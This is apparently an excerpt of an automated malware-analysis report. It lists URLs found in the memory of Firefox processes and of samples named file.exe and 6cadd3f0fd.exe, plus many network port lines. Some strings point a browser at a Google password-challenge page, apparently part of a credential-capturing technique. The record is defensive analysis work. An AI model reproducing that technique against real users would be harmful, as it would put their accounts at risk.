Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2744766730.000001C170CD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001B.00000003.2674078299.000001C17CD4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://extensions/content/schemas/telemetry.jso
Source: firefox.exe, 0000001B.00000002.2749174259.000001C17191A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2674563212.000001C17CF5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2676858066.000001C17CF80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2778187093.000001C174C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search_flippedInheritedAttributes
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001B.00000002.2744766730.000001C170C8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2733122243.000001C164C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2778559508.000001C174D83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2725658450.0000000A4E94B000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171937000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 0000001B.00000003.2683990291.000001C175A58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2683314621.000001C175A4A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000003.1711563084.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2485074230.000000000559C000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.1711563084.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2485074230.000000000559C000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001B.00000002.2725658450.0000000A4E94B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgsqlite_temp_master
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B79700A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001B.00000003.2679591143.000001C1774F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178089000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001B.00000003.2678449963.000001C1780DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001B.00000002.2719893448.0000000A46FD8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accoSt?=https://a
Source: firefox.exe, 00000020.00000002.2720468138.000002B796E60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
Source: firefox.exe, 00000020.00000002.2720880731.000002B796EAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.2577497195.000001A424CB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2590723298.000001446A807000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2732087108.000001C1649C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000020.00000002.2720880731.000002B796EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdI
Source: firefox.exe, 0000001B.00000002.2734125620.000001C1667EA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2722821711.0000015475E50000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2727612952.0000015476184000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2720468138.000002B796E64000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2720880731.000002B796EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMozElements.MozEleme
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdh
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58655 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58661 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58644 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 58620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 58645 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 58684 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 58690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58656 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58659
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58655
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58658
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58663
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58665
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58661
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 58651 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 58686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 58700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58672
Source: unknown Network traffic detected: HTTP traffic on port 58692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58652 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58684
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58687
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58686
Source: unknown Network traffic detected: HTTP traffic on port 58691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58680
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
